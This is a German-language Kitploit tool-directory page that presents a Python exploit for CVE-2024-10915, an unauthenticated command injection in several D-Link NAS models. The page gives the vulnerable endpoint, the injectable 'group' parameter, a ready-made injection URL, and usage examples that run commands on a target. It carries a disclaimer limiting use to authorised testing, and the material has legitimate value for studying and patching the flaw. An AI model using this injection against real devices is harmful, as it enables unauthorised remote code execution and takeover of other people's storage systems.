Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10915 | Kitploit
Tools/GitHubGitHub/r0otk3r/cve-2024-10915
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed Teaming
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10915 - D-Link NAS Command-Injection-Exploit

Dieser auf Python basierende Exploit zielt auf eine Command-Injection-Schwachstelle in mehreren D-Link-NAS-Produkten über den Endpunkt /cgi-bin/account_mgr.cgi?cmd=cgi_user_add ab. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Systembefehle auf dem betroffenen Gerät auszuführen.

Beschreibung

CVE-2024-10915 betrifft mehrere D-Link-NAS-Modelle. Ein Angreifer kann über den Parameter group im Befehl cgi_user_add Befehle einschleusen, was zu Remote-Codeausführung führt.

Betroffene Produkte

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
Verwundbarer Endpunkt: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

Beispiel:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

Anforderungen

  • Python 3.x

  • requests-Bibliothek

Erforderliche Abhängigkeiten installieren:

root@kitploit:~
pip3 install requests

Verwendung

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

Optionen:

Beispiel 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

Beispiel 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

Beispiel 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungs- und autorisierten Testzwecken. Verwenden Sie dieses Tool nicht in Netzwerken oder auf Systemen, für die Sie keine ausdrückliche Genehmigung besitzen. Die Autoren übernehmen keinerlei Verantwortung für Missbrauch oder verursachte Schäden.


Offizielle Kanäle

  • YouTube @rootctf
  • X @r0otk3r
Tool herunterladen
OptionBeschreibung
-u / --urlBasis-URL des Ziels (z. B. http://192.168.1.100)
-c / --commandAuf dem Gerät auszuführender Befehl (Standard: id)
-p / --proxyHTTP-Proxy verwenden (z. B. http://127.0.0.1:8080)
-o / --outputHTTP-Antwort in einer Datei speichern
-l / --listBetroffene D-Link-NAS-Produkte auflisten